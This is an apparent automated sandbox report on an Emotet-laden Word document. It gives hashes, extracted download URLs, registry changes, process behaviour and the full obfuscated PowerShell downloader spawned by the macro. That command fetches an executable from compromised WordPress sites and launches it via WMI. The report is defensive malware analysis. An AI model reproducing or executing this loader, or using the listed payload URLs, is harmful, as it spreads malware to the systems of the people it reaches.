Analysis
-
max time kernel
134s -
max time network
136s -
platform
windows7_x64 -
resource
win7 -
submitted
28-10-2020 11:26
Static task
static1
Behavioral task
behavioral1
Sample
emotet_e2_cb10354a6aff051fe7ae1c2cfb38b40e5ed1c8fd1a4c4b1a35724efed4885995_2020-10-28__112244386138._fpx.doc
Resource
win7
Behavioral task
behavioral2
Sample
emotet_e2_cb10354a6aff051fe7ae1c2cfb38b40e5ed1c8fd1a4c4b1a35724efed4885995_2020-10-28__112244386138._fpx.doc
Resource
win10
General
-
Target
emotet_e2_cb10354a6aff051fe7ae1c2cfb38b40e5ed1c8fd1a4c4b1a35724efed4885995_2020-10-28__112244386138._fpx.doc
-
Size
241KB
-
MD5
270f03e3d9fef36f88e51dd5dfec47c1
-
SHA1
79874b79923b7ea19a4d5caa9c8512767e9a4285
-
SHA256
cb10354a6aff051fe7ae1c2cfb38b40e5ed1c8fd1a4c4b1a35724efed4885995
-
SHA512
53c2fac1ef4b5f70eb0a77ff0359e226fabd533e2828b97f90ab4aa1f8a35572fffb7be07efb3775abf9df7ad67539890912429b7a75b901a711264b28ef90d4
Malware Config
Extracted
http://nanettecook.org/wp-admin/x/
http://scalarmonitoring.com/wp-admin/js/widgets/S0A/
https://fourseasonsjsc.com/wp-admin/hzu9vvt/
https://ningyangseo.com/wp-admin/am/
https://www.rapidcarwash.net/wp-content/nO6U/
http://coolchacult.com/wp-includes/i/
http://anpbodysculpting.com/wp-content/themes/twentytwenty/c/
https://lamajesteindustries.com/wp-content/DRTujMR/
Signatures
-
Process spawned unexpected child process 1 IoCs
This typically indicates the parent process was compromised via an exploit or macro.
Processes:
POwersheLL.exedescription pid pid_target process target process Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 1704 1200 POwersheLL.exe -
Blacklisted process makes network request 2 IoCs
Processes:
POwersheLL.exeflow pid process 7 1704 POwersheLL.exe 8 1704 POwersheLL.exe -
Executes dropped EXE 1 IoCs
Processes:
T14e00.exepid process 1136 T14e00.exe -
Drops file in System32 directory 1 IoCs
Processes:
POwersheLL.exedescription ioc process File opened for modification C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk POwersheLL.exe -
Drops file in Windows directory 1 IoCs
Processes:
WINWORD.EXEdescription ioc process File opened for modification C:\Windows\Debug\WIA\wiatrace.log WINWORD.EXE -
Office loads VBA resources, possible macro or embedded object present
-
Processes:
WINWORD.EXEdescription ioc process Key created \REGISTRY\USER\S-1-5-21-4210623931-3856158591-1213714290-1000\Software\Microsoft\Internet Explorer\Toolbar WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-4210623931-3856158591-1213714290-1000\Software\Microsoft\Internet Explorer\MenuExt\Se&nd to OneNote WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-4210623931-3856158591-1213714290-1000\Software\Microsoft\Internet Explorer\MenuExt\E&xport to Microsoft Excel WINWORD.EXE Set value (str) \REGISTRY\USER\S-1-5-21-4210623931-3856158591-1213714290-1000\Software\Microsoft\Internet Explorer\MenuExt\E&xport to Microsoft Excel\ = "res://C:\\PROGRA~2\\MICROS~1\\Office14\\EXCEL.EXE/3000" WINWORD.EXE Set value (int) \REGISTRY\USER\S-1-5-21-4210623931-3856158591-1213714290-1000\Software\Microsoft\Internet Explorer\MenuExt\E&xport to Microsoft Excel\Contexts = "1" WINWORD.EXE Set value (str) \REGISTRY\USER\S-1-5-21-4210623931-3856158591-1213714290-1000\Software\Microsoft\Internet Explorer\Toolbar\ShowDiscussionButton = "Yes" WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-4210623931-3856158591-1213714290-1000\Software\Microsoft\Internet Explorer\MenuExt WINWORD.EXE Set value (str) \REGISTRY\USER\S-1-5-21-4210623931-3856158591-1213714290-1000\Software\Microsoft\Internet Explorer\MenuExt\Se&nd to OneNote\ = "res://C:\\PROGRA~2\\MICROS~1\\Office14\\ONBttnIE.dll/105" WINWORD.EXE Set value (int) \REGISTRY\USER\S-1-5-21-4210623931-3856158591-1213714290-1000\Software\Microsoft\Internet Explorer\MenuExt\Se&nd to OneNote\Contexts = "55" WINWORD.EXE -
Modifies registry class 280 IoCs
Processes:
WINWORD.EXEdescription ioc process Key created \REGISTRY\USER\S-1-5-21-4210623931-3856158591-1213714290-1000_CLASSES\Wow6432Node\Interface\{92E11A03-7358-11CE-80CB-00AA00611080} WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-4210623931-3856158591-1213714290-1000_CLASSES\Interface\{8BD21D52-EC42-11CE-9E0D-00AA006002F3} WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-4210623931-3856158591-1213714290-1000_CLASSES\Interface\{7B020EC1-AF6C-11CE-9F46-00AA00574A4F} WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-4210623931-3856158591-1213714290-1000_CLASSES\Interface\{4C5992A5-6926-101B-9992-00000B65C6F9} WINWORD.EXE Set value (str) \REGISTRY\USER\S-1-5-21-4210623931-3856158591-1213714290-1000_CLASSES\Wow6432Node\Interface\{47FF8FE3-6198-11CF-8CE8-00AA006CB389}\ = "WHTMLControlEvents4" WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-4210623931-3856158591-1213714290-1000_CLASSES\Interface\{A38BFFC3-A5A0-11CE-8107-00AA00611080} WINWORD.EXE Set value (str) \REGISTRY\USER\S-1-5-21-4210623931-3856158591-1213714290-1000_CLASSES\Interface\{29B86A70-F52E-11CE-9BCE-00AA00608E01}\ = "IOptionFrame" WINWORD.EXE Set value (str) \REGISTRY\USER\S-1-5-21-4210623931-3856158591-1213714290-1000_CLASSES\Interface\{04598FC1-866C-11CF-AB7C-00AA00C08FCF}\ = "ILabelControl" WINWORD.EXE Set value (str) \REGISTRY\USER\S-1-5-21-4210623931-3856158591-1213714290-1000_CLASSES\Interface\{8BD21D43-EC42-11CE-9E0D-00AA006002F3}\ = "IMdcCheckBox" WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-4210623931-3856158591-1213714290-1000_CLASSES\Interface\{04598FC2-866C-11CF-AB7C-00AA00C08FCF} WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-4210623931-3856158591-1213714290-1000_CLASSES\Interface\{47FF8FE2-6198-11CF-8CE8-00AA006CB389} WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-4210623931-3856158591-1213714290-1000_CLASSES\Wow6432Node\Interface WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-4210623931-3856158591-1213714290-1000_CLASSES\Wow6432Node\Interface\{5512D115-5CC6-11CF-8D67-00AA00BDCE1D} WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-4210623931-3856158591-1213714290-1000_CLASSES\Interface\{8BD21D62-EC42-11CE-9E0D-00AA006002F3} WINWORD.EXE Set value (str) \REGISTRY\USER\S-1-5-21-4210623931-3856158591-1213714290-1000_CLASSES\Interface\{5CEF5613-713D-11CE-80C9-00AA00611080}\ = "IPage" WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-4210623931-3856158591-1213714290-1000_CLASSES\Wow6432Node\Interface\{04598FC4-866C-11CF-AB7C-00AA00C08FCF} WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-4210623931-3856158591-1213714290-1000_CLASSES\Wow6432Node\Interface\{8A683C90-BA84-11CF-8110-00A0C9030074} WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-4210623931-3856158591-1213714290-1000_CLASSES\Interface\{04598FC7-866C-11CF-AB7C-00AA00C08FCF} WINWORD.EXE Set value (str) \REGISTRY\USER\S-1-5-21-4210623931-3856158591-1213714290-1000_CLASSES\Wow6432Node\Interface\{8BD21D23-EC42-11CE-9E0D-00AA006002F3}\ = "IMdcList" WINWORD.EXE Set value (str) \REGISTRY\USER\S-1-5-21-4210623931-3856158591-1213714290-1000_CLASSES\Wow6432Node\Interface\{8BD21D63-EC42-11CE-9E0D-00AA006002F3}\ = "IMdcToggleButton" WINWORD.EXE Set value (str) \REGISTRY\USER\S-1-5-21-4210623931-3856158591-1213714290-1000_CLASSES\Wow6432Node\Interface\{04598FC3-866C-11CF-AB7C-00AA00C08FCF}\ = "IScrollbar" WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-4210623931-3856158591-1213714290-1000_CLASSES\Interface\{5512D11B-5CC6-11CF-8D67-00AA00BDCE1D} WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-4210623931-3856158591-1213714290-1000_CLASSES\Interface\{5512D11D-5CC6-11CF-8D67-00AA00BDCE1D} WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-4210623931-3856158591-1213714290-1000_CLASSES\Wow6432Node\Interface\{EC72F590-F375-11CE-B9E8-00AA006B1A69} WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-4210623931-3856158591-1213714290-1000_CLASSES\Wow6432Node\Interface\{9A4BBF53-4E46-101B-8BBD-00AA003E3B29} WINWORD.EXE Set value (str) \REGISTRY\USER\S-1-5-21-4210623931-3856158591-1213714290-1000_CLASSES\Interface\{79176FB2-B7F2-11CE-97EF-00AA006D2776}\ = "SpinbuttonEvents" WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-4210623931-3856158591-1213714290-1000_CLASSES\Wow6432Node WINWORD.EXE Set value (str) \REGISTRY\USER\S-1-5-21-4210623931-3856158591-1213714290-1000_CLASSES\Wow6432Node\Interface\{5B9D8FC8-4A71-101B-97A6-00000B65C08B}\ = "FormEvents" WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-4210623931-3856158591-1213714290-1000_CLASSES\Interface\{47FF8FE4-6198-11CF-8CE8-00AA006CB389} WINWORD.EXE Set value (str) \REGISTRY\USER\S-1-5-21-4210623931-3856158591-1213714290-1000_CLASSES\Interface\{04598FC6-866C-11CF-AB7C-00AA00C08FCF}\ = "IControl" WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-4210623931-3856158591-1213714290-1000_CLASSES\Wow6432Node\Interface\{5512D11D-5CC6-11CF-8D67-00AA00BDCE1D} WINWORD.EXE Set value (str) \REGISTRY\USER\S-1-5-21-4210623931-3856158591-1213714290-1000_CLASSES\Wow6432Node\Interface\{7B020EC1-AF6C-11CE-9F46-00AA00574A4F}\ = "CommandButtonEvents" WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-4210623931-3856158591-1213714290-1000_CLASSES\Wow6432Node\Interface\{47FF8FE4-6198-11CF-8CE8-00AA006CB389} WINWORD.EXE Set value (str) \REGISTRY\USER\S-1-5-21-4210623931-3856158591-1213714290-1000_CLASSES\Wow6432Node\Interface\{8BD21D43-EC42-11CE-9E0D-00AA006002F3}\ = "IMdcCheckBox" WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-4210623931-3856158591-1213714290-1000_CLASSES\Interface\{04598FC3-866C-11CF-AB7C-00AA00C08FCF} WINWORD.EXE Set value (str) \REGISTRY\USER\S-1-5-21-4210623931-3856158591-1213714290-1000_CLASSES\Wow6432Node\Interface\{CF3F94A0-F546-11CE-9BCE-00AA00608E01}\ = "OptionFrameEvents" WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-4210623931-3856158591-1213714290-1000_CLASSES\Wow6432Node\Interface\{5512D123-5CC6-11CF-8D67-00AA00BDCE1D} WINWORD.EXE Set value (str) \REGISTRY\USER\S-1-5-21-4210623931-3856158591-1213714290-1000_CLASSES\Interface\{7B020EC7-AF6C-11CE-9F46-00AA00574A4F}\ = "TabStripEvents" WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-4210623931-3856158591-1213714290-1000_CLASSES\Interface\{47FF8FE8-6198-11CF-8CE8-00AA006CB389} WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-4210623931-3856158591-1213714290-1000_CLASSES\Wow6432Node\Interface\{04598FC3-866C-11CF-AB7C-00AA00C08FCF} WINWORD.EXE Set value (str) \REGISTRY\USER\S-1-5-21-4210623931-3856158591-1213714290-1000_CLASSES\Interface\{47FF8FE8-6198-11CF-8CE8-00AA006CB389}\ = "WHTMLControlEvents9" WINWORD.EXE Set value (str) \REGISTRY\USER\S-1-5-21-4210623931-3856158591-1213714290-1000_CLASSES\Wow6432Node\Interface\{92E11A03-7358-11CE-80CB-00AA00611080}\ = "Pages" WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-4210623931-3856158591-1213714290-1000_CLASSES\Interface\{92E11A03-7358-11CE-80CB-00AA00611080} WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-4210623931-3856158591-1213714290-1000_CLASSES\Wow6432Node\Interface\{47FF8FE1-6198-11CF-8CE8-00AA006CB389} WINWORD.EXE Set value (str) \REGISTRY\USER\S-1-5-21-4210623931-3856158591-1213714290-1000_CLASSES\Wow6432Node\Interface\{5512D113-5CC6-11CF-8D67-00AA00BDCE1D}\ = "IWHTMLImage" WINWORD.EXE Set value (str) \REGISTRY\USER\S-1-5-21-4210623931-3856158591-1213714290-1000_CLASSES\Interface\{5512D125-5CC6-11CF-8D67-00AA00BDCE1D}\ = "IWHTMLTextArea" WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-4210623931-3856158591-1213714290-1000_CLASSES\Wow6432Node\Interface\{04598FC7-866C-11CF-AB7C-00AA00C08FCF} WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-4210623931-3856158591-1213714290-1000_CLASSES\Interface\{47FF8FE0-6198-11CF-8CE8-00AA006CB389} WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-4210623931-3856158591-1213714290-1000_CLASSES\Wow6432Node\Interface\{7B020EC1-AF6C-11CE-9F46-00AA00574A4F} WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-4210623931-3856158591-1213714290-1000_CLASSES\Wow6432Node\Interface\{79176FB3-B7F2-11CE-97EF-00AA006D2776} WINWORD.EXE Set value (str) \REGISTRY\USER\S-1-5-21-4210623931-3856158591-1213714290-1000_CLASSES\Wow6432Node\Interface\{79176FB3-B7F2-11CE-97EF-00AA006D2776}\ = "ISpinbutton" WINWORD.EXE Set value (str) \REGISTRY\USER\S-1-5-21-4210623931-3856158591-1213714290-1000_CLASSES\Wow6432Node\Interface\{8BD21D13-EC42-11CE-9E0D-00AA006002F3}\ = "IMdcText" WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-4210623931-3856158591-1213714290-1000_CLASSES\Interface\{8A683C90-BA84-11CF-8110-00A0C9030074} WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-4210623931-3856158591-1213714290-1000_CLASSES\Interface\{8BD21D43-EC42-11CE-9E0D-00AA006002F3} WINWORD.EXE Set value (str) \REGISTRY\USER\S-1-5-21-4210623931-3856158591-1213714290-1000_CLASSES\TypeLib\{05D7AA7A-0549-45B9-8660-13E174FD70AD}\2.0\HELPDIR\ = "C:\\Users\\Admin\\AppData\\Local\\Temp\\VBE" WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-4210623931-3856158591-1213714290-1000_CLASSES\Interface\{5512D111-5CC6-11CF-8D67-00AA00BDCE1D} WINWORD.EXE Set value (str) \REGISTRY\USER\S-1-5-21-4210623931-3856158591-1213714290-1000_CLASSES\Wow6432Node\Interface\{8BD21D22-EC42-11CE-9E0D-00AA006002F3}\ = "MdcListEvents" WINWORD.EXE Set value (str) \REGISTRY\USER\S-1-5-21-4210623931-3856158591-1213714290-1000_CLASSES\Wow6432Node\Interface\{BEF6E003-A874-101A-8BBA-00AA00300CAB}\ = "Font" WINWORD.EXE Set value (str) \REGISTRY\USER\S-1-5-21-4210623931-3856158591-1213714290-1000_CLASSES\Wow6432Node\Interface\{82B02370-B5BC-11CF-810F-00A0C9030074}\ = "IReturnInteger" WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-4210623931-3856158591-1213714290-1000_CLASSES\Interface\{82B02372-B5BC-11CF-810F-00A0C9030074} WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-4210623931-3856158591-1213714290-1000_CLASSES\Wow6432Node\Interface\{5512D11F-5CC6-11CF-8D67-00AA00BDCE1D} WINWORD.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Classes\TypeLib\{05D7AA7A-0549-45B9-8660-13E174FD70AD}\2.0\FLAGS WINWORD.EXE Set value (str) \REGISTRY\USER\S-1-5-21-4210623931-3856158591-1213714290-1000_CLASSES\Wow6432Node\Interface\{47FF8FE0-6198-11CF-8CE8-00AA006CB389}\ = "WHTMLControlEvents1" WINWORD.EXE Set value (str) \REGISTRY\USER\S-1-5-21-4210623931-3856158591-1213714290-1000_CLASSES\Wow6432Node\Interface\{47FF8FE6-6198-11CF-8CE8-00AA006CB389}\ = "WHTMLControlEvents7" WINWORD.EXE -
Suspicious behavior: AddClipboardFormatListener 1 IoCs
Processes:
WINWORD.EXEpid process 1544 WINWORD.EXE -
Suspicious behavior: EnumeratesProcesses 2 IoCs
Processes:
POwersheLL.exepid process 1704 POwersheLL.exe 1704 POwersheLL.exe -
Suspicious use of AdjustPrivilegeToken 1 IoCs
Processes:
POwersheLL.exedescription pid process Token: SeDebugPrivilege 1704 POwersheLL.exe -
Suspicious use of SetWindowsHookEx 3 IoCs
Processes:
WINWORD.EXET14e00.exepid process 1544 WINWORD.EXE 1544 WINWORD.EXE 1136 T14e00.exe
Processes
-
C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE"C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\emotet_e2_cb10354a6aff051fe7ae1c2cfb38b40e5ed1c8fd1a4c4b1a35724efed4885995_2020-10-28__112244386138._fpx.doc"1⤵
- Drops file in Windows directory
- Modifies Internet Explorer settings
- Modifies registry class
- Suspicious behavior: AddClipboardFormatListener
- Suspicious use of SetWindowsHookEx
-
C:\Windows\System32\WindowsPowerShell\v1.0\POwersheLL.exePOwersheLL -ENCOD s E t - I t E M   v a r I A B L e : N 5 9 O m     (   [ t Y p E ] ( " { 1 } { 4 } { 0 } { 2 } { 3 } { 5 } " - F   ' m . I ' , ' S y ' , ' o . d i ' , ' r e c t o R ' , ' S T e ' , ' Y ' ) )   ;     s E T   ( ' x 2 ' + ' i ' )   ( [ t Y p E ] ( " { 5 } { 4 } { 3 } { 1 } { 2 } { 0 } { 6 } "   - f   ' A ' , ' I c E p O I ' , ' n t M ' , ' V ' , ' r ' , ' S Y s t e M . n E T . s E ' , ' n A G e R ' )   )   ;     $ R u s v c x v = ( ' U l ' + ( ' 1 ' + ' p 2 p 0 ' ) ) ; $ K 0 u l p n e = $ T 0 0 3 8 r g   +   [ c h a r ] ( 6 4 )   +   $ E 9 6 m k f 8 ; $ Z w x 6 6 t 0 = ( ( ' I 9 f ' + ' v ' ) + ( ' x ' + ' 0 h ' ) ) ;     (     g E t - V A R I a b l E     N 5 9 O M   - v a l u e O n l y ) : : " C ` R e A T ` E D I r e ` c ` T o R y " ( $ H O M E   +   ( ( ( ' m ' + ' t z D 8 ' + ' c 9 8 n ' ) + ' n ' + ( ' m t z O s ' + ' s ' ) + ' 0 ' + ( ' 8 b _ ' + ' m t z ' ) ) - r e P L A C E     ( [ C H a R ] 1 0 9 + [ C H a R ] 1 1 6 + [ C H a R ] 1 2 2 ) , [ C H a R ] 9 2 ) ) ; $ O g h 9 d i c = ( ' J h ' + ( ' p f 3 ' + ' i ' ) + ' 6 ' ) ;     (   V A r i A b L E     ( ' X 2 ' + ' i ' )   - V a l U e ) : : " s ` e C ` U R i t y ` p R O T O C O l "   =   ( ( ' T ' + ' l s ' ) + ' 1 2 ' ) ; $ K m q e 4 d r = ( ' Z q ' + ( ' q ' + ' 0 m v ' ) + ' y ' ) ; $ R 7 _ c y 0 p   =   ( ' T ' + ( ' 1 4 ' + ' e ' ) + ' 0 0 ' ) ; $ T u p r x e 5 = ( ( ' B ' + ' c r ' ) + ( ' g ' + ' k s c ' ) ) ; $ L z 0 0 x 4 d = ( ' U ' + ( ' u g p ' + ' b q 2 ' ) ) ; $ Y 7 e d n l 2 = $ H O M E + ( ( ' { 0 } D ' + ( ' 8 ' + ' c 9 ' ) + ' 8 n n { ' + ' 0 } O s ' + ' s 0 8 b _ { ' + ' 0 } ' ) - F   [ C H A R ] 9 2 ) + $ R 7 _ c y 0 p + ( ( ' . ' + ' e x ' ) + ' e ' ) ; $ L c z v n x 5 = ( ' E 1 ' + ' n 8 ' + ( ' 6 ' + ' p n ' ) ) ; $ Z g l a 5 a r = . ( ' n e w - o b j ' + ' e c ' + ' t ' )   n e T . W e B c L I e N T ; $ G l 6 g 5 7 e = ( ( ( ( ' h t t p ' + ' : ] [   ' + ' ( 0 ' + '   h ' + ' u ' + ' B J   [ ]   ' + ' [ ] w ] ' + ' [   ( ' + ' 0   h ' + ' u B J   [ ' + ' ] ' + '   [ ] w n a n e t ' + ' t ' + ' e c o o ' ) ) + ( ( ' k . o r g ' + ' ] [ ' + '   ( ' + ' 0 ' + '   h u ' + ' B J   ' + ' [ ] ' + '   [ ] w w p - a ' + ' d m i n ' + ' ] ' + ' [   ( ' + ' 0   h ' + ' u B ' + ' J   [ ' + ' ]   [ ' + ' ] w x ' + ' ] [   ( 0   h ' + ' u B J ' + '   [ ]   [ ] w @ h ' + ' t t ' + ' p : ' + ' ] [   ( 0 ' ) ) + ( '   h u B J   [ ' + ' ]   [ ' + ' ] ' ) + ( ( ' w ] [   ( 0   h u ' + ' B J   [ ' + ' ] ' + '   ' + ' [ ] ' + ' w s c ' + ' a l a r m ' ) ) + ( ( ' o n i t o r i n g ' + ' . ' + ' c ' + ' o m ' + ' ] [   ( 0 ' + '   ' + ' h ' + ' u B J   ' + ' [ ] ' + '   [ ] ' + ' w ' + ' w p - ' + ' a d m i ' + ' n ' + ' ] [ ' + '   ( 0   h u ' + ' B J   [ ]   [ ] w j s ] ' + ' [ ' + '   ( 0   h u B J   [ ] ' + '   ' + ' [ ] w ' + ' w i d ' + ' g e ' ) ) + ( ( ' t s ' + ' ] ' + ' [   ( 0   h u B J   [ ' + ' ]   [ ] w ' ) ) + ( ( ' S 0 A ] ' + ' [ ' + '   ( ' ) ) + ( ( ' 0 ' + '   h u B ' + ' J ' + '   [ ]   [ ] w @ h t t ' + ' p s : ] [ ' + '   ( 0 ' + '   h u ' + ' B J ' + '   [ ]   [ ] w ' + ' ] [   ' + ' ( ' + ' 0   h u ' + ' B ' + ' J   [ ' + ' ]   [ ' + ' ] ' + ' w f o u r s e a s o n ' + ' s j ' + ' s c ' + ' . ' + ' c o ' + ' m ] ' + ' [   ( 0   ' + ' h ' ) ) + ( ' u B J   ' + ' [ ' ) + ( ( ' ] ' + '   [ ] w w p - a ' + ' d m i ' + ' n ] [   ( 0   h ' + ' u B ' + ' J   ' ) ) + ( ' [ ]   [ ' + ' ] w h ' + ' z u ' + ' 9 v v t ' ) + ( ( ' ] [   ' + ' ( 0   h ' ) ) + ( ' u B J   [ ]   [ ] w ' + ' @ ' + ' h ' ) + ( ' t t ' + ' p ' ) + ( ( ' s : ] ' + ' [ ' + '   ( 0   h u ' + ' B J   [ ' + ' ] ' + '   [ ] w ' + ' ] [ ' ) ) + ( ( '   ( ' + ' 0   h u B J   [ ]   [ ' + ' ] w ' + ' n i n g y a n ' + ' g s e o . c o ' + ' m ' + ' ] ' + ' [ ' + '   ( 0 ' + '   h u B ' + ' J ' + '   [ ]   [ ] ' + ' w w p - a ' + ' d m i ' + ' n ] [ ' + '   ( 0   h ' + ' u B J   [ ]   [ ] w a ' + ' m ] [   ( ' + ' 0   ' + ' h ' + ' u B J   [ ' + ' ]   [ ] w @ ' + ' h t t p ' + ' s : ] [   ( 0 ' + '   h u B J ' + '   [ ]   [ ] ' + ' w ] ' + ' [   ' + ' ( 0   ' + ' h u B J   [ ' ) ) + ( ' ] ' + '   [ ' + ' ] w w ' + ' w ' + ' w . ' + ' r a p i d c a r w a ' ) + ( ' s ' + ' h . ' ) + ( ( ' n ' + ' e t ] [   ' + ' ( 0   h u B ' + ' J ' + '   [ ] ' + '   [ ] w w p - c o n t e n ' + ' t ] [   ( 0   h u B J   [ ]   [ ' + ' ] w n O 6 U ] ' + ' [   ( 0   h u B J   ' + ' [ ]   [ ' + ' ] w ' + ' @ h ' + ' t t p : ' ) ) + ( ( ' ] ' + ' [ ' + '   ( 0   ' + ' h ' + ' u ' + ' B ' + ' J   [ ' + ' ]   [ ] w ] [   ( 0   h u B J ' + '   [ ] ' + '   [ ] ' ) ) + ( ' w ' + ' c o ' + ' o l c h ' ) + ( ( ' a c u l t . c o m ] [ ' + '   ( 0   h ' + ' u ' + ' B ' + ' J   [ ]   [ ] w w p ' ) ) + ( ( ' - i ' + ' n c l u ' + ' d e s ' + ' ] [ ' + '   ( 0   h u ' + ' B ' + ' J   [ ]   ' + ' [ ' + ' ] w i ' + ' ] ' + ' [   ( 0   h ' + ' u B J   ' + ' [ ]   [ ] ' ) ) + ( ( ' w @ h t t p ' + ' : ' + ' ] [   ' + ' ( 0   ' ) ) + ( ' h u ' + ' B J   [ ] ' + '   ' + ' [ ] w ] ' ) + ( ( ' [ ' + '   ( 0   h u B J   ' + ' [ ]   [ ] ' + ' w a n p b ' + ' o ' ) ) + ' d ' + ( ( ' y s ' + ' c u l ' + ' p t i n g . c o ' + ' m ] [ ' + '   ' + ' ( 0 ' ) ) + ( ( '   h ' + ' u B J ' + '   [ ' + ' ]   [ ] w w p - c o ' + ' n t ' + ' e n t ] [   ( ' + ' 0   h u B J   [ ]   [ ] w ' + ' t h e m e s ' + ' ] [   ( 0   ' + ' h u B J   [ ]   [ ] w t w e ' + ' n ' + ' t y t ' + ' w e n t y ] [   ( 0   h ' + ' u ' + ' B J   [ ]   [ ' ) ) + ( ( ' ] ' + ' w c ' + ' ] ' + ' [   ' + ' ( 0   h u B J   [ ' + ' ]   [ ] w @ h t t p s : ] [   ' + ' ( 0 ' + '   h ' + ' u ' ) ) + ( ( ' B ' + ' J   ' + ' [ ]   [ ] w ] [   ( 0 ' + '   h u B J   ' + ' [ ] ' + '   [ ] w ' + ' l a m a j e s ' + ' t e i n d u s t ' ) ) + ( ( ' r i ' + ' e ' + ' s . ' + ' c o m ' + ' ] [   ( 0   h u B J   [ ]   [ ] w w p ' + ' - c o ' + ' n t e ' + ' n t ] [ ' + '   ( 0   h u B ' + ' J ' + '   [ ]   [ ] ' + ' w D R T ' + ' u ' + ' j M R ] ' + ' [   ( 0 ' + '   ' + ' h u B J   [ ' ) ) + ( ' ]   [ ] ' + ' w ' ) ) ) . " R e p L A ` c E " ( ( ( ' ] [ ' + ( ( '   ( ' ) ) + ' 0 ' + ( '   h u ' + ' B J   ' + ' [ ] ' ) + ( '   ' + ' [ ] ' ) + ' w ' ) ) , ( [ a r r a y ] ( ' / ' ) , ( ' x w ' + ' e ' ) ) [ 0 ] ) . " S ` P l I T " ( $ R n n p _ _ x   +   $ K 0 u l p n e   +   $ M t z d 9 p z ) ; $ I 3 1 h 4 s _ = ( ( ' W 6 ' + ' 4 9 ' ) + ' p g ' + ' b ' ) ; f o r e a c h   ( $ X d x f d 0 b   i n   $ G l 6 g 5 7 e ) { t r y { $ Z g l a 5 a r . " d O W N L ` O a D F I ` L e " ( $ X d x f d 0 b ,   $ Y 7 e d n l 2 ) ; $ F r 2 y d l 2 = ( ( ' L 3 d ' + ' 6 9 2 ' ) + ' g ' ) ; I f   ( ( & ( ' G e ' + ' t - I t ' + ' e m ' )   $ Y 7 e d n l 2 ) . " L ` e n g ` T H "   - g e   4 5 0 0 2 )   { ( [ w m i c l a s s ] ( ' w ' + ' i n ' + ' 3 ' + ( ' 2 ' + ' _ P r o ' ) + ( ' c e s ' + ' s ' ) ) ) . " C R ` E A T e " ( $ Y 7 e d n l 2 ) ; $ T v d z f 8 g = ( ( ' O u ' + ' e ' ) + ' h z ' + ' t k ' ) ; b r e a k ; $ I 7 r y a u a = ( ' G ' + ( ' 2 b ' + ' o e 7 ' ) + ' e ' ) } } c a t c h { } } $ B 7 z w 0 y b = ( ( ' O ' + ' k t 3 ' ) + ' w ' + ' j 2 ' ) 1⤵
- Process spawned unexpected child process
- Blacklisted process makes network request
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Users\Admin\D8c98nn\Oss08b_\T14e00.exeC:\Users\Admin\D8c98nn\Oss08b_\T14e00.exe1⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
Network
MITRE ATT&CK Matrix ATT&CK v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Users\Admin\D8c98nn\Oss08b_\T14e00.exeMD5
299fba7ff4723ad5e636bf1c7c7e82c9
SHA1be946fb55fd7a49b6c8378174f9e5d08f25bef02
SHA256243a3acceef49b4aa15bb73dd9fa0bff752858638cf2bab735b3d1149ee09bcb
SHA51245e9418c282ef91219460b198a34bbb918a89a6b3aa470134b48fd0ecdb1780e1d0d2bab5bd343b5f262387085a56155dd6655341b13b3e85c120126613ab477
-
memory/1544-0-0x0000000000634000-0x0000000000639000-memory.dmpFilesize
20KB
-
memory/1544-1-0x0000000006440000-0x0000000006444000-memory.dmpFilesize
16KB
-
memory/1544-2-0x000000000579C000-0x000000000579E000-memory.dmpFilesize
8KB
-
memory/1544-3-0x000000000579E000-0x00000000057A0000-memory.dmpFilesize
8KB
-
memory/1544-4-0x00000000057E6000-0x00000000057F6000-memory.dmpFilesize
64KB
-
memory/1704-6-0x0000000002450000-0x0000000002451000-memory.dmpFilesize
4KB
-
memory/1704-7-0x000000001A9D0000-0x000000001A9D1000-memory.dmpFilesize
4KB
-
memory/1704-8-0x000000001B340000-0x000000001B341000-memory.dmpFilesize
4KB
-
memory/1704-9-0x00000000024A0000-0x00000000024A1000-memory.dmpFilesize
4KB
-
